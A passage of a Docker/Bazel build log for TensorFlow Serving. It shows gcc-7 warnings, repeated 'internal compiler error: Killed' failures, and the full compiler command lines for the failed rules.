external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:27, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.h:35, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:16: #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3126.6 TransactionToken** token) { #16 3126.6 ^~~~~ #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 3126.6 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3126.6 TransactionToken** token) { #16 3126.6 ^~~~~ #16 3126.6 In file included from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:77:0: #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc: In function 'mlir::ArrayAttr mlir::TF::{anonymous}::ShuffleArrayAttr(mlir::ArrayAttr, llvm::ArrayRef<long int>, int)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:320:26: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (size_t j = 0; j < inner_size; ++j) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc: In function 'bool mlir::TF::{anonymous}::AreCancellablePermutations(mlir::DenseIntElementsAttr, mlir::DenseIntElementsAttr)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:357:21: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (int i = 0; i < perm0_values.size(); ++i) { #16 3126.6 ~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::Verify(mlir::TF::OneHotOp)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:119:42: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 !(axis == -1 || (axis >= 0 && axis <= indices_ty.getShape().size()))) { #16 3126.6 ~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In member function 'mlir::OpFoldResult mlir::TF::PackOp::fold(llvm::ArrayRef<mlir::Attribute>)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:301:24: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (arg_ty.getRank() != values().size()) return {}; #16 3126.6 ~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In member function 'mlir::LogicalResult mlir::TF::PadOp::FoldOperandsPermutation(llvm::ArrayRef<long int>)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:323:39: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 paddings_value.getNumElements() != permutation.size() * 2) #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::Verify(mlir::TF::ParseExampleV2Op)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:379:23: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (op.num_sparse() != sparse_types_count) { #16 3126.6 ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:383:34: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (op.sparse_indices().size() != sparse_types_count) { #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:387:33: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 if (op.sparse_shapes().size() != sparse_types_count) { #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::{anonymous}::VerifyShapeOperandAndResult(mlir::Operation*, mlir::Type, mlir::Type, int)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:871:42: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 result_ranked_type.getDimSize(0) != #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~ #16 3126.6 operand_ranked_type.getShape().size()) #16 3126.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In function 'mlir::LogicalResult mlir::TF::Verify(mlir::TF::SpaceToBatchNDOp)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1270:28: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 0; i < block_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1286:28: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 0; i < block_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc: In static member function 'static mlir::LogicalResult mlir::TF::SpaceToBatchNDOp::inferReturnTypes(mlir::MLIRContext*, llvm::Optional<mlir::Location>, mlir::ValueRange, mlir::DictionaryAttr, mlir::RegionRange, llvm::SmallVectorImpl<mlir::Type>&)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1342:39: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 1 + block_rank; i < input_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1353:28: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 0; i < block_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 In file included from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:77:0: #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc: At global scope: #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:522:22: warning: 'mlir::LogicalResult mlir::TF::{anonymous}::VerifyReductionInputAndDims(mlir::Value, mlir::Value, mlir::Location)' defined but not used [-Wunused-function] #16 3126.6 static LogicalResult VerifyReductionInputAndDims(Value input, Value dims, #16 3126.6 ^~~~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:309:11: warning: 'mlir::ArrayAttr mlir::TF::{anonymous}::ShuffleArrayAttr(mlir::ArrayAttr, llvm::ArrayRef<long int>, int)' defined but not used [-Wunused-function] #16 3126.6 ArrayAttr ShuffleArrayAttr(ArrayAttr attr, ArrayRef<int64_t> permutation, #16 3126.6 ^~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:296:25: warning: 'llvm::SmallVector<long int, 4> mlir::TF::{anonymous}::GetDataFormatPermutation(llvm::StringRef, llvm::StringRef)' defined but not used [-Wunused-function] #16 3126.6 SmallVector<int64_t, 4> GetDataFormatPermutation(StringRef from, StringRef to) { #16 3126.6 ^~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:272:6: warning: 'bool mlir::TF::{anonymous}::CanUseGpuDevice(mlir::Operation*)' defined but not used [-Wunused-function] #16 3126.6 bool CanUseGpuDevice(Operation *op) { #16 3126.6 ^~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:260:6: warning: 'bool mlir::TF::{anonymous}::CanUseTensorCores(const mlir::TF::RuntimeDevices&)' defined but not used [-Wunused-function] #16 3126.6 bool CanUseTensorCores(const RuntimeDevices &devices) { #16 3126.6 ^~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:254:6: warning: 'bool mlir::TF::{anonymous}::CanUseGpuDevice(const mlir::TF::RuntimeDevices&)' defined but not used [-Wunused-function] #16 3126.6 bool CanUseGpuDevice(const RuntimeDevices &devices) { #16 3126.6 ^~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:65:13: warning: 'bool mlir::TF::{anonymous}::IsUnknownDimOrRank(int64_t)' defined but not used [-Wunused-function] #16 3126.6 static bool IsUnknownDimOrRank(int64_t dim_or_rank) { #16 3126.6 ^~~~~~~~~~~~~~~~~~ #16 3126.6 gcc: internal compiler error: Killed (program cc1plus) #16 3126.6 Please submit a full bug report, #16 3126.6 with preprocessed source if appropriate. #16 3126.6 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/BUILD:509:1: Couldn't build file external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.o: C++ compilation of rule '@org_tensorflow//tensorflow/compiler/mlir/tensorflow:tensorflow_ops' failed (Exit 4): gcc failed: error executing command #16 3180.9 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 3180.9 exec env - \ #16 3180.9 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 3180.9 PWD=/proc/self/cwd \ #16 3180.9 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 3180.9 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.o' -DLLVM_ENABLE_STATS -D__STDC_LIMIT_MACROS -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -DLLVM_BUILD_GLOBAL_ISEL -DTF_USE_SNAPPY -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/llvm-project -iquote bazel-out/k8-opt/bin/external/llvm-project -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/CallOpInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/InferTypeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/OpAsmInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/RegionKindInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SideEffectInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SymbolInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/DerivedAttributeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/LoopLikeInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ParserTokenKinds -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ControlFlowInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/StandardOpsIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/VectorInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ViewLikeInterfaceIncGen -isystem external/llvm-project/llvm/include -isystem bazel-out/k8-opt/bin/external/llvm-project/llvm/include -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/llvm-project/mlir/include -isystem bazel-out/k8-opt/bin/external/llvm-project/mlir/include -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.o) #16 3180.9 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/allocator.h:26, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/tensor.h:23, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/attr_value_util.h:24, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/node_def_util.h:23, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/shape_inference.h:21, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/common_shape_fns.h:20, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:25, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.h:38, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.cc:16: #16 3181.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 3181.1 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 3181.1 ^ #16 3181.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 3181.1 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 3181.1 ^ #16 3181.1 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:27, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.h:38, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.cc:16: #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3181.1 TransactionToken** token) { #16 3181.1 ^~~~~ #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3181.1 TransactionToken** token) { #16 3181.1 ^~~~~ #16 3181.1 gcc: internal compiler error: Killed (program cc1plus) #16 3181.1 Please submit a full bug report, #16 3181.1 with preprocessed source if appropriate. #16 3181.1 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/BUILD:3376:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels:cwise_op' failed (Exit 4): gcc failed: error executing command #16 3959.7 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 3959.7 exec env - \ #16 3959.7 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 3959.7 PWD=/proc/self/cwd \ #16 3959.7 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 3959.7 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DTF_USE_SNAPPY -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' '-DMLIR_GENERATED_GPU_KERNELS_ENABLED=1' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/cwise_op_equal_to_1.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.o) #16 3959.7 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 3959.7 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 3959.7 from external/org_tensorflow/tensorflow/core/framework/allocator.h:26, #16 3959.7 from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:24, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_ops_common.h:29, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_equal_to_1.cc:16: #16 3959.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 3959.7 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 3959.7 ^ #16 3959.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 3959.7 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 3959.7 ^ #16 3959.7 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_ops_common.h:29, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_equal_to_1.cc:16: #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3959.7 TransactionToken** token) { #16 3959.7 ^~~~~ #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3959.7 TransactionToken** token) { #16 3959.7 ^~~~~ #16 3959.7 gcc: internal compiler error: Killed (program cc1plus) #16 3959.7 Please submit a full bug report, #16 3959.7 with preprocessed source if appropriate. #16 3959.7 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/BUILD:3376:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels:cwise_op' failed (Exit 4): gcc failed: error executing command #16 4065.1 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 4065.1 exec env - \ #16 4065.1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 4065.1 PWD=/proc/self/cwd \ #16 4065.1 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 4065.1 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DTF_USE_SNAPPY -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote 